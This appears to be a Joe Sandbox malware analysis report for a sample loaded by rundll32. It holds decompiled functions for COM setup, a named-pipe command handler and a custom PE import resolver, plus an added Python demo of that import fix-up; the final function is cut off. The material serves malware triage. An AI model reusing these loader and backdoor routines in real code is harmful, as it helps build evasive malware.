            • Instruction ID: 5880baed81fb62504b91675ba7d2897d891fccfca76d1b08029365e3e627dd7a
            • Opcode Fuzzy Hash: 353f941563edf6a18604ee3d1b63578f9296c99f674609c9cda5fcce4f5449f2
            • Instruction Fuzzy Hash: 1F41A371A0020AABDB25CDA88D9EAFF7769DF41624F180157FD12DE740E361CAA182DD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 30%
            			E0346E485(void* __ecx) {
            				char _v8;
            				void* _v12;
            				char* _t15;
            				intOrPtr* _t16;
            				void* _t21;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				intOrPtr* _t25;
            				void* _t30;
            				void* _t33;
            
            				_v12 = 0;
            				_v8 = 0;
            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
            				_t15 =  &_v12;
            				__imp__CoCreateInstance(0x347c8a0, 0, 1, 0x347c8b0, _t15);
            				if(_t15 < 0) {
            					L5:
            					_t23 = _v8;
            					if(_t23 != 0) {
            						 *((intOrPtr*)( *_t23 + 8))(_t23);
            					}
            					_t24 = _v12;
            					if(_t24 != 0) {
            						 *((intOrPtr*)( *_t24 + 8))(_t24);
            					}
            					_t16 = 0;
            				} else {
            					__imp__#2(__ecx);
            					_t25 = _v12;
            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
            					if(_t21 < 0) {
            						goto L5;
            					} else {
            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
            						if(_t21 < 0) {
            							goto L5;
            						} else {
            							_t16 = E03468DC9(8);
            							if(_t16 == 0) {
            								goto L5;
            							} else {
            								 *((intOrPtr*)(_t16 + 4)) = _v12;
            								 *_t16 = _v8;
            							}
            						}
            					}
            				}
            				return _t16;
            			}

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4A9
            • CoCreateInstance.OLE32(0347C8A0,00000000,00000001,0347C8B0,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0346E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4F6
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: c4e3129caa0c34ae8d208830a91fa5ce664af4740b774380aeec7d2c2c0fb540
            • Instruction ID: 755c5b3e9a1ccae46e9f90e0eaf41b5f84ec204eda0a05a72e3c88a61c54fa04
            • Opcode Fuzzy Hash: c4e3129caa0c34ae8d208830a91fa5ce664af4740b774380aeec7d2c2c0fb540
            • Instruction Fuzzy Hash: C6214974600245BFEB249FA2DD5CEABBFBCEFC2B15F10015EB505AA290D7719A40CA71
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E034733DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
            				signed int _t12;
            				signed int _t13;
            				signed int _t23;
            				void* _t30;
            				char* _t31;
            				char* _t33;
            				char* _t35;
            				char* _t37;
            				char* _t38;
            				long long* _t40;
            
            				_t30 = __edi;
            				_t12 = _a20;
            				if(_t12 == 0) {
            					_t12 = 0x11;
            				}
            				_t35 = _a4;
            				_push(_t25);
            				 *_t40 = _a12;
            				_push(_t12);
            				_push("%.*g");
            				_push(_a8);
            				_push(_t35);
            				L03473533();
            				_t23 = _t12;
            				if(_t23 < 0 || _t23 >= _a8) {
            					L16:
            					_t13 = _t12 | 0xffffffff;
            					goto L17;
            				} else {
            					E034733B3(_t12, _t35);
            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
            						L8:
            						_push(_t30);
            						_t37 = strchr(_t35, 0x65);
            						_t31 = _t37;
            						if(_t37 == 0) {
            							L15:
            							_t13 = _t23;
            							L17:
            							return _t13;
            						}
            						_t38 = _t37 + 1;
            						_t33 = _t31 + 2;
            						if( *_t38 == 0x2d) {
            							_t38 = _t33;
            						}
            						while( *_t33 == 0x30) {
            							_t33 = _t33 + 1;
            						}
            						if(_t33 != _t38) {
            							E03468ECB(_t38, _t33, _t23 - _t33 + _a4);
            							_t23 = _t23 + _t38 - _t33;
            						}
            						goto L15;
            					} else {
            						_t6 = _t23 + 3; // 0x3471bc5
            						_t12 = _t6;
            						if(_t12 >= _a8) {
            							goto L16;
            						}
            						_t35[_t23] = 0x302e;
            						( &(_t35[2]))[_t23] = 0;
            						_t23 = _t23 + 2;
            						goto L8;
            					}
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 623a954ee8ffdf06cba5aa1ffa4f729f7cc1058997cdedb43aeb77259d18f618
            • Instruction ID: 97b99a9a789d9b28d444f573d05515c2587ef3e316b0721b8027ef44f186f2b0
            • Opcode Fuzzy Hash: 623a954ee8ffdf06cba5aa1ffa4f729f7cc1058997cdedb43aeb77259d18f618
            • Instruction Fuzzy Hash: 0621573A6047146ADB2BDE2DEC85BEF779C9F01A64F1800ABF8448E280E7A5D94153DD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E03463775(void* __fp0) {
            				signed int _v144;
            				signed int _v152;
            				char _v160;
            				char _v164;
            				char _v168;
            				signed int _v172;
            				char _v176;
            				intOrPtr _v180;
            				signed int _v184;
            				signed int _v188;
            				signed int _v192;
            				signed int _v196;
            				char _v200;
            				signed int _v204;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				signed int _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t87;
            				signed int _t88;
            				signed int _t100;
            				void* _t102;
            				void* _t103;
            				unsigned int* _t104;
            				signed int _t110;
            				signed int _t113;
            				void* _t118;
            				intOrPtr _t124;
            				signed int _t127;
            				intOrPtr _t129;
            				intOrPtr _t132;
            				void* _t133;
            				void* _t136;
            				signed int _t145;
            				signed int _t147;
            				signed short* _t148;
            				signed int _t158;
            				intOrPtr* _t182;
            				void* _t186;
            				void* _t187;
            				void* _t188;
            				signed short* _t191;
            				void* _t195;
            				signed int _t198;
            				signed int _t199;
            				signed int _t203;
            				signed int _t204;
            				char _t205;
            				signed int _t207;
            				void* _t209;
            				void* _t215;
            				void* _t222;
            
            				_t222 = __fp0;
            				_t209 = (_t207 & 0xfffffff8) - 0xac;
            				_v144 = 0;
            				_v172 = 0;
            				while(1) {
            					_t72 =  *0x347f8d0; // 0x50ff8c0
            					_push(0);
            					_push( *0x347f8b4);
            					_v152 = 0;
            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
            						break;
            					}
            					_push(0);
            					_push( &_v160);
            					_t75 =  *0x347f8d0; // 0x50ff8c0
            					_push(0x80000);
            					_push( *0x347f974);
            					_push( *0x347f8b4);
            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
            						GetLastError();
            						goto L56;
            					} else {
            						_t148 =  *0x347f974; // 0x0
            						_t80 =  *_t148 & 0x0000ffff;
            						_t215 = _t80 - 8;
            						if(_t215 > 0) {
            							_t81 = _t80 - 9;
            							__eflags = _t81;
            							if(_t81 == 0) {
            								E034709C3( &_v200);
            								L12:
            								_t84 =  &_v200;
            								L13:
            								_push(4);
            								L14:
            								_push(_t84);
            								_push(5);
            								L31:
            								_pop(_t186);
            								E0346D297(_t186);
            								L32:
            								L56:
            								DisconnectNamedPipe( *0x347f8b4);
            								_push(0);
            								_pop(0);
            								_push(1);
            								_pop(1);
            								if(_v172 == 0) {
            									continue;
            								}
            								break;
            							}
            							_t87 = _t81;
            							__eflags = _t87;
            							if(_t87 == 0) {
            								_v204 = 0;
            								_t88 = E034616B0( &_v204, _t222);
            								_v188 = _t88;
            								__eflags = _t88;
            								if(_t88 == 0) {
            									_push(4);
            									_v192 = 0;
            									_push( &_v192);
            									L19:
            									_push(0xa);
            									goto L31;
            								}
            								_t145 = _v204;
            								_t90 = _t145 * 0x16;
            								_v184 = _t145 * 0x16;
            								_t203 = E03468DC9(_t90);
            								_v192 = _t203;
            								__eflags = _t203;
            								if(_t203 == 0) {
            									_t64 =  &_v192;
            									 *_t64 = _v192 & 0x00000000;
            									__eflags =  *_t64;
            									_push(4);
            									_push( &_v192);
            									_t187 = 0xa;
            									E0346D297(_t187);
            									L52:
            									E03468DDF( &_v188, _t145);
            									goto L32;
            								}
            								_t198 = 0;
            								__eflags = _t145;
            								if(_t145 == 0) {
            									L50:
            									_push(E0346A5D0(_t203));
            									_push(_t203);
            									_t188 = 5;
            									E0346D297(_t188);
            									E03468DDF( &_v192, 0xffffffff);
            									_t209 = _t209 + 0x10;
            									goto L52;
            								}
            								_t158 = _v188 + 4;
            								__eflags = _t158;
            								_v204 = _t158;
            								do {
            									__eflags = _t198;
            									if(_t198 != 0) {
            										__eflags = _t198 - _t145 - 1;
            										if(_t198 < _t145 - 1) {
            											_t102 = E0346A5D0(_t203);
            											_t158 = _v204;
            											 *((short*)(_t102 + _t203)) = 0x3b;
            										}
            									}
            									_t100 =  *_t158;
            									_v196 = _t100;
            									__eflags = _t100;
            									if(_t100 != 0) {
            										_t103 = E0346A5D0(_t203);
            										_t104 = _v204;
            										_push(_t104[1] & 0x0000ffff);
            										_push( *_t104 >> 0x18);
            										_push(_t104[0] & 0x000000ff);
            										_push(_t104[0] & 0x000000ff);
            										_t110 = E0346A5D0(_t203) + _t203;
            										__eflags = _t110;
            										E03469FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
            										_t158 = _v204;
            										_t209 = _t209 + 0x20;
            									}
            									_t198 = _t198 + 1;
            									_t158 = _t158 + 0x20;
            									_v204 = _t158;
            									__eflags = _t198 - _t145;
            								} while (_t198 < _t145);
            								goto L50;
            							}
            							__eflags = _t87 != 1;
            							if(_t87 != 1) {
            								goto L56;
            							}
            							_v204 = 0;
            							_t113 = E034616B0( &_v204, _t222);
            							_t204 = _v204;
            							_v196 = _t113;
            							__eflags = _t113;
            							if(_t113 != 0) {
            								E03468DDF( &_v196, _t204);
            							}
            							_v204 = _t204 * 0x16;
            							_t84 =  &_v204;
            							goto L13;
            						}
            						if(_t215 == 0) {
            							_t84 = E034709C3( &_v200);
            							L16:
            							__eflags = _t84;
            							if(_t84 == 0) {
            								_push(0);
            								_push(0);
            								goto L19;
            							}
            							_push(_v200);
            							goto L14;
            						}
            						_t118 = _t80 - 1;
            						if(_t118 == 0) {
            							_t199 = E03469D29( &(_t148[4]), 0x20, 1,  &_v176);
            							_v196 = _t199;
            							__eflags = _t199;
            							if(_t199 == 0) {
            								L30:
            								_t191 =  *0x347f974; // 0x0
            								E0346A06E( &_v164,  &(_t191[4]), 0x80);
            								_push(0x84);
            								_push( &_v168);
            								_push(2);
            								goto L31;
            							}
            							_t205 = _v176;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								_t124 = E03461D97(E0346A102( *_t199, __eflags), 0, 0, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t124;
            								goto L30;
            							}
            							_t125 = _t205 - 1;
            							_v184 = _t205 - 1;
            							_t127 = E03468DC9(_t125 << 2);
            							_v188 = _t127;
            							__eflags = _t127;
            							if(_t127 == 0) {
            								goto L30;
            							}
            							_t147 = 1;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								L28:
            								_t129 = E03461D97(E0346A102( *_t199, __eflags), _t127, _v184, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t129;
            								E03469E22( &_v176);
            								goto L30;
            							}
            							_v204 = _t127;
            							do {
            								_t132 = E03469A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0346A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
            								_t182 = _v204;
            								_t147 = _t147 + 1;
            								 *_t182 = _t132;
            								_v204 = _t182 + 4;
            								__eflags = _t147 - _t205;
            							} while (__eflags < 0);
            							_t127 = _v188;
            							goto L28;
            						}
            						_t133 = _t118 - 3;
            						if(_t133 == 0) {
            							_push(0);
            							_push(0);
            							_t195 = 5;
            							E0346D297(_t195);
            							 *0x347f9a8 = 1;
            							_v172 = 1;
            							goto L56;
            						}
            						_t136 = _t133;
            						if(_t136 == 0) {
            							_t84 = E034709A1( &_v200);
            							goto L16;
            						}
            						if(_t136 != 1) {
            							goto L56;
            						}
            						E034709A1( &_v200);
            						goto L12;
            					}
            				}
            				return 0;
            			}

            APIs
            • GetLastError.KERNEL32 ref: 034637AB
              • Part of subcall function 0346D297: FlushFileBuffers.KERNEL32(00000000,?,03463ABB,00000000,00000004), ref: 0346D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 03463AF8
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: c97bf42690e5beca3d1f9538bfd4d39bd2112b618ea5024d9a7b123236b0d0da
            • Instruction ID: e9e80b0f6b33f6b823e3ce8685b1ac861a6b50bd13abc99c241d613b84e5a79f
            • Opcode Fuzzy Hash: c97bf42690e5beca3d1f9538bfd4d39bd2112b618ea5024d9a7b123236b0d0da
            • Instruction Fuzzy Hash: 7CA1C0BA508341AFD314EF65D884A6BB7E8EB84310F08492FF5559F290EB34D9098F5B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0347376C(signed int __eax, void* __ecx, intOrPtr _a4) {
            				intOrPtr* _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				struct HINSTANCE__* _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				struct HINSTANCE__* _v48;
            				intOrPtr _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				signed int _t109;
            				signed int _t112;
            				signed int _t115;
            				void* _t163;
            				void* _t167;
            
            				_t167 = __ecx;
            				_v44 = _v44 & 0x00000000;
            				if(_a4 != 0) {
            					_v48 = GetModuleHandleA("kernel32.dll");
            					_v40 = E0346F024(_t167, _v48, "GetProcAddress");
            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            					_v32 = _v52;
            					_t109 = 8;
            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
            						L24:
            						return 0;
            					}
            					_v56 = 0x80000000;
            					_t112 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v8 = _v8 + 0x14;
            					}
            					_t115 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_t34 = _v8 + 0xc; // 0xffff
            						_v36 = LoadLibraryA( *_t34 + _a4);
            						if(_v36 != 0) {
            							if( *_v8 == 0) {
            								_t43 = _v8 + 0x10; // 0xb8
            								_v12 =  *_t43 + _a4;
            							} else {
            								_v12 =  *_v8 + _a4;
            							}
            							_v28 = _v28 & 0x00000000;
            							while( *_v12 != 0) {
            								_v24 = _v24 & 0x00000000;
            								_v16 = _v16 & 0x00000000;
            								_v64 = _v64 & 0x00000000;
            								_v20 = _v20 & 0x00000000;
            								if(( *_v12 & _v56) == 0) {
            									_v60 =  *_v12 + _a4;
            									_v20 = _v60 + 2;
            									_t73 = _v8 + 0x10; // 0xb8
            									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
            									_v16 = _v40(_v36, _v20);
            								} else {
            									_v24 =  *_v12;
            									_v20 = _v24 & 0x0000ffff;
            									_v16 = _v40(_v36, _v20);
            								}
            								if(_v24 != _v16) {
            									_v44 = _v44 + 1;
            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
            										 *_v12 = _v16;
            									} else {
            										_t89 = _v8 + 0x10; // 0xb8
            										 *( *_t89 + _a4 + _v28) = _v16;
            									}
            								}
            								_v12 =  &(_v12[1]);
            								_v28 = _v28 + 4;
            							}
            							_v8 = _v8 + 0x14;
            							continue;
            						}
            						_t163 = 0xfffffffd;
            						return _t163;
            					}
            					goto L24;
            				}
            				return __eax | 0xffffffff;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03473789
            • LoadLibraryA.KERNEL32(00000000), ref: 03473822
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: 897d2aab6daf8e783abac95ade05c129dbd227a1656ae5c2453567bdd9aea423
            • Instruction ID: c654787b19b9d68931822d8178d2c4a1c18965d6624ff0bf5ba1c94832959534
            • Opcode Fuzzy Hash: 897d2aab6daf8e783abac95ade05c129dbd227a1656ae5c2453567bdd9aea423
            • Instruction Fuzzy Hash: 6B616DB9900209EFDB00CF98C585BEDBBF1BF08315F24859AE465AB351D374AA81DF94
            Uniqueness
            • Uniqueness Score: -1.00%

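The loop in the listing above is a hand-rolled import resolver, the fix-up step of a loader that maps a PE image itself instead of going through the Windows loader. Every constant in it is a PE import-directory constant: `_v8` steps through IMAGE_IMPORT_DESCRIPTOR entries in 0x14-byte strides, `_v8 + 0x10` is the FirstThunk (IAT) field, the `*_v8 == 0` branch falls back to FirstThunk when OriginalFirstThunk is absent, `(*_v12 & _v56)` tests the ordinal flag (for the `& 0xffff` branch to make sense `_v56` has to be IMAGE_ORDINAL_FLAG32, 0x80000000), `_v60 + 2` skips the two-byte Hint before the function name, and `_v40(_v36, _v20)` has the GetProcAddress(module, name-or-ordinal) shape, which is what the function's `kernel32.dll` / `GetProcAddress` strings and the GetModuleHandleA/LoadLibraryA calls point to. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it parses and patches a constructed 32-bit import directory the same way, with a dictionary standing in for GetProcAddress so it runs offline. The RVAs, the ordinal 2000 and the addresses in FAKE_EXPORTS are invented for the demo.

```python
import struct

# Constants the loop in the listing hard-codes (names are the PE-spec names, added here).
IMAGE_ORDINAL_FLAG32 = 0x80000000   # mask tested as (*_v12 & _v56): ordinal import when set
IMPORT_DESCRIPTOR_SIZE = 0x14       # sizeof(IMAGE_IMPORT_DESCRIPTOR): the `_v8 = _v8 + 0x14` stride


def read_u32(image, rva):
    return struct.unpack_from("<I", image, rva)[0]


def read_cstr(image, rva):
    end = image.index(b"\x00", rva)
    return image[rva:end].decode("ascii")


def walk_import_descriptors(image, import_dir_rva):
    """Yield (dll_name, lookup_rva, iat_rva) for each descriptor up to the all-zero terminator."""
    rva = import_dir_rva
    while True:
        # Fields: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk (offset 0x10,
        # the `_v8 + 0x10` read in the listing).
        olt, _stamp, _chain, name_rva, iat_rva = struct.unpack_from("<IIIII", image, rva)
        if name_rva == 0 and iat_rva == 0:
            return
        # OriginalFirstThunk == 0 means the names live in FirstThunk itself: the `*_v8 == 0` branch.
        yield read_cstr(image, name_rva), (olt or iat_rva), iat_rva
        rva += IMPORT_DESCRIPTOR_SIZE


def resolve_imports(image, import_dir_rva, get_proc_address):
    """Patch every IAT slot in place, the way the listing's loop does, and return
    [(dll, symbol, slot_rva, address)] in resolution order.

    get_proc_address(dll, symbol) stands in for the real GetProcAddress call (_v40);
    symbol is a str for name imports and an int for ordinal imports. An unresolvable
    symbol raises LookupError, mirroring the listing's 0xfffffffd failure return.
    (The listing also tolerates a zero FirstThunk by writing into the lookup table
    itself; that corner is not replicated here.)"""
    patched = []
    for dll, lookup_rva, iat_rva in walk_import_descriptors(image, import_dir_rva):
        index = 0
        while True:
            entry = read_u32(image, lookup_rva + 4 * index)
            if entry == 0:                                  # `while (*_v12 != 0)`
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                symbol = entry & 0xFFFF                     # `_v20 = _v24 & 0x0000ffff`
            else:
                symbol = read_cstr(image, entry + 2)        # `_v20 = _v60 + 2` skips the Hint word
            address = get_proc_address(dll, symbol)
            if address is None:
                raise LookupError(f"{dll}!{symbol}")
            slot = iat_rva + 4 * index                      # `FirstThunk + base + _v28`, _v28 += 4
            struct.pack_into("<I", image, slot, address)
            patched.append((dll, symbol, slot, address))
            index += 1
    return patched


def build_sample_image():
    """Constructed 32-bit import directory for the demo (not extracted from the sample):
    kernel32.dll imported by name through a separate lookup table, user32.dll imported by
    ordinal with OriginalFirstThunk == 0, all at small RVAs inside a zero-filled image."""
    img = bytearray(0x200)
    IMPORT_DIR, ILT0, IAT0, IAT1 = 0x000, 0x040, 0x050, 0x070
    NAME_K32, HN_GPA, HN_LLA, NAME_U32 = 0x080, 0x0A0, 0x0C0, 0x0D0
    for rva, blob in ((NAME_K32, b"kernel32.dll\x00"),
                      (HN_GPA, b"\x00\x00GetProcAddress\x00"),   # 2-byte Hint, then the name
                      (HN_LLA, b"\x00\x00LoadLibraryA\x00"),
                      (NAME_U32, b"user32.dll\x00")):
        img[rva:rva + len(blob)] = blob
    struct.pack_into("<IIIII", img, IMPORT_DIR, ILT0, 0, 0, NAME_K32, IAT0)
    struct.pack_into("<IIIII", img, IMPORT_DIR + IMPORT_DESCRIPTOR_SIZE, 0, 0, 0, NAME_U32, IAT1)
    struct.pack_into("<III", img, ILT0, HN_GPA, HN_LLA, 0)
    struct.pack_into("<III", img, IAT0, HN_GPA, HN_LLA, 0)              # unbound IAT mirrors the ILT
    struct.pack_into("<II", img, IAT1, IMAGE_ORDINAL_FLAG32 | 2000, 0)  # hypothetical ordinal 2000
    return img


# Hypothetical export addresses so the demo runs without a Windows process.
FAKE_EXPORTS = {
    ("kernel32.dll", "GetProcAddress"): 0x7C80AE40,
    ("kernel32.dll", "LoadLibraryA"): 0x7C801D7B,
    ("user32.dll", 2000): 0x77D507EA,
}


def fake_get_proc_address(dll, symbol):
    return FAKE_EXPORTS.get((dll.lower(), symbol))


if __name__ == "__main__":
    image = build_sample_image()
    for dll, symbol, slot, address in resolve_imports(image, 0, fake_get_proc_address):
        print(f"{dll:14} {symbol!s:16} IAT[0x{slot:03x}] <- 0x{address:08x}")
```

When triaging a loader like this, the things worth recording are exactly what the walker exposes: which DLLs it pulls in, whether it imports by ordinal (which evades name-based string hunting), and which IAT slots it overwrites, since those slots are what a memory dump of the mapped image will show after the fix-up has run.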
            C-Code - Quality: 99%
            			E03474160(int _a4, signed int _a8) {
            				int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void* __esi;
            				void* _t137;
            				signed int _t141;
            				intOrPtr* _t142;
            				signed int _t145;
            				signed int _t146;
            				intOrPtr _t151;
            				intOrPtr _t161;
            				intOrPtr _t162;
            				intOrPtr _t167;
            				intOrPtr _t170;
            				signed int _t172;
            				intOrPtr _t173;
            				int _t184;
            				intOrPtr _t185;
            				intOrPtr _t188;
            				signed int _t189;
            				void* _t195;
            				int _t202;
            				int _t208;
            				intOrPtr _t217;
            				signed int _t218;
            				int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				int _t224;
            				int _t225;
            				signed int _t227;
            				intOrPtr _t228;
            				int _t232;
            				int _t234;
            				signed int _t235;
            				int _t239;
            				void* _t240;
            				int _t245;
            				int _t252;
            				signed int _t253;
            				int _t254;
            				void* _t257;
            				void* _t258;
            				int _t259;
            				intOrPtr _t260;
            				int _t261;
            				signed int _t269;
            				signed int _t271;
            				intOrPtr* _t272;
            				void* _t273;
            
            				_t253 = _a8;
            				_t272 = _a4;
            				_t3 = _t272 + 0xc; // 0x452bf84d
            				_t4 = _t272 + 0x2c; // 0x8df075ff
            				_t228 =  *_t4;
            				_t137 =  *_t3 + 0xfffffffb;
            				_t229 =  <=  ? _t137 : _t228;
            				_v16 =  <=  ? _t137 : _t228;
            				_t269 = 0;
            				_a4 =  *((intOrPtr*)( *_t272 + 4));
            				asm("o16 nop [eax+eax]");
            				while(1) {
            					_t8 = _t272 + 0x16bc; // 0x5d08408b
            					_t141 =  *_t8 + 0x2a >> 3;
            					_v12 = 0xffff;
            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
            					if(_t217 < _t141) {
            						break;
            					}
            					_t11 = _t272 + 0x6c; // 0x51ec8b55
            					_t12 = _t272 + 0x5c; // 0xee85000
            					_t245 =  *_t11 -  *_t12;
            					_v8 = _t245;
            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
            					_t247 =  <  ? _t195 : _v12;
            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
            					if(_t227 >= _v16) {
            						L7:
            						if(_t253 != 4) {
            							L10:
            							_t269 = 0;
            							__eflags = 0;
            						} else {
            							_t285 = _t227 - _t195;
            							if(_t227 != _t195) {
            								goto L10;
            							} else {
            								_t269 = _t253 - 3;
            							}
            						}
            						E03477180(_t272, _t272, 0, 0, _t269);
            						_t18 = _t272 + 0x14; // 0xc703f045
            						_t19 = _t272 + 8; // 0x8d000040
            						 *( *_t18 +  *_t19 - 4) = _t227;
            						_t22 = _t272 + 0x14; // 0xc703f045
            						_t23 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
            						_t26 = _t272 + 0x14; // 0xc703f045
            						_t27 = _t272 + 8; // 0x8d000040
            						 *( *_t26 +  *_t27 - 2) =  !_t227;
            						_t30 = _t272 + 0x14; // 0xc703f045
            						_t31 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
            						E03475EE0(_t285,  *_t272);
            						_t202 = _v8;
            						_t273 = _t273 + 0x14;
            						if(_t202 != 0) {
            							_t208 =  >  ? _t227 : _t202;
            							_v8 = _t208;
            							_t36 = _t272 + 0x38; // 0xf47d8bff
            							_t37 = _t272 + 0x5c; // 0xee85000
            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
            							_t273 = _t273 + 0xc;
            							_t252 = _v8;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
            							_t227 = _t227 - _t252;
            						}
            						if(_t227 != 0) {
            							E03476020( *_t272,  *( *_t272 + 0xc), _t227);
            							_t273 = _t273 + 0xc;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
            						}
            						_t253 = _a8;
            						if(_t269 == 0) {
            							continue;
            						}
            					} else {
            						if(_t227 != 0 || _t253 == 4) {
            							if(_t253 != 0 && _t227 == _t195) {
            								goto L7;
            							}
            						}
            					}
            					break;
            				}
            				_t142 =  *_t272;
            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
            				_a4 = _t232;
            				if(_t232 == 0) {
            					_t83 = _t272 + 0x6c; // 0x51ec8b55
            					_t254 =  *_t83;
            				} else {
            					_t59 = _t272 + 0x2c; // 0x8df075ff
            					_t224 =  *_t59;
            					if(_t232 < _t224) {
            						_t65 = _t272 + 0x3c; // 0x830cc483
            						_t66 = _t272 + 0x6c; // 0x51ec8b55
            						_t260 =  *_t66;
            						__eflags =  *_t65 - _t260 - _t232;
            						if( *_t65 - _t260 <= _t232) {
            							_t67 = _t272 + 0x38; // 0xf47d8bff
            							_t261 = _t260 - _t224;
            							 *(_t272 + 0x6c) = _t261;
            							memcpy( *_t67,  *_t67 + _t224, _t261);
            							_t70 = _t272 + 0x16b0; // 0x8508458b
            							_t188 =  *_t70;
            							_t273 = _t273 + 0xc;
            							_t232 = _a4;
            							__eflags = _t188 - 2;
            							if(_t188 < 2) {
            								_t189 = _t188 + 1;
            								__eflags = _t189;
            								 *(_t272 + 0x16b0) = _t189;
            							}
            						}
            						_t73 = _t272 + 0x38; // 0xf47d8bff
